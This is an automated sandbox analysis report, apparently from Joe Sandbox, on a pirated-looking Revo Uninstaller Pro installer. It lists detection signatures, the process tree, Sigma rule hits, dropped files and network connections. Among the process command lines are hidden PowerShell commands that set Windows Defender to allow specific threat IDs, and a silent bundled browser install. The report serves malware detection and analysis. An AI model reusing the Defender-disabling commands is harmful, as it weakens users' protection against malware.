Windows Analysis Report
Revo.Uninstaller.Pro.v5.3.4.exe

Overview

General Information

Sample name: Revo.Uninstaller.Pro.v5.3.4.exe
Analysis ID: 1571786
MD5: 881464f03502d44e29e5fea8b4c35538
SHA1: 8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
SHA256: 2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
Tags: exe, user-Bacn

Detection

Score: 44
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Loading BitLocker PowerShell Module
Possible COM Object hijacking
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Classes Autorun Keys Modification
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Suspicious Rundll32 Setupapi.dll Activity
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Revo.Uninstaller.Pro.v5.3.4.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe" MD5: 881464F03502D44E29E5FEA8B4C35538)
    • rundll32.exe (PID: 8032 cmdline: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf MD5: EF3179D498793BF4234F708D3BE28633)
      • runonce.exe (PID: 8060 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
        • grpconv.exe (PID: 8096 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
    • regsvr32.exe (PID: 7288 cmdline: regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • RevoUninPro.exe (PID: 7340 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • ruplp.exe (PID: 712 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT MD5: 216B49B7EB7BE44D7ED7367F3725285F)
    • RevoUninPro.exe (PID: 1244 cmdline: "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" MD5: EE15BFE5A394ADBFB087B053A6A72821)
    • cmd.exe (PID: 916 cmdline: cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PACK.EXE (PID: 7620 cmdline: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123 MD5: A868E9C0A97C2EF80602C0F6634913F8)
        • powershell.exe (PID: 7516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ya.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe" MD5: 7ACCFDE96C04320BA099144A7BE710CC)
          • OperaSetup.exe (PID: 660 cmdline: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0 MD5: 43D37A6E0FE6E9824DFD80221E6AAD13)
            • setup.exe (PID: 3532 cmdline: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=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 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 6032 cmdline: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
              • setup.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000 MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
                • setup.exe (PID: 7196 cmdline: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c MD5: F9DA76E8D7DB633AB031EE5AC59BB55E)
  • ruplp.exe (PID: 5116 cmdline: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding MD5: 216B49B7EB7BE44D7ED7367F3725285F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000000.1735791667.0000000000401000.00000020.00000001.01000000.0000000F.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
9.0.ruplp.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 7620, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 7516, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 7288, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\(Default)
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 8032, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems); Data: Command: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, CommandLine|base64offset|contains: [HZ, Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe", ParentImage: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe, ParentProcessId: 7668, ParentProcessName: Revo.Uninstaller.Pro.v5.3.4.exe, ProcessCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ProcessId: 8032, ProcessName: rundll32.exe
Source: Process started; Author: Konstantin Grishchenko, oscd.community; Data: Command: "C:\Windows\system32\runonce.exe" -r, CommandLine: "C:\Windows\system32\runonce.exe" -r, CommandLine|base64offset|contains: , Image: C:\Windows\System32\runonce.exe, NewProcessName: C:\Windows\System32\runonce.exe, OriginalFileName: C:\Windows\System32\runonce.exe, ParentCommandLine: RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8032, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\system32\runonce.exe" -r, ProcessId: 8060, ProcessName: runonce.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, NewProcessName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, OriginalFileName: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding, ProcessId: 5116, ProcessName: ruplp.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", CommandLine|base64offset|contains: z%, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\PACK.EXE -p123, ParentImage: C:\Users\user\AppData\Local\Temp\PACK.EXE, ParentProcessId: 7620, ParentProcessName: PACK.EXE, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force", ProcessId: 7516, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkg; ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE; ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe; ReversingLabs: Detection: 25%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.6% probability
Source: Revo.Uninstaller.Pro.v5.3.4.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.bat
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldb
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller Pro
Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe; File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114003209.log
Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe; File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209114005402.log
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe; File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt
Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.9:49716 version: TLS 1.2
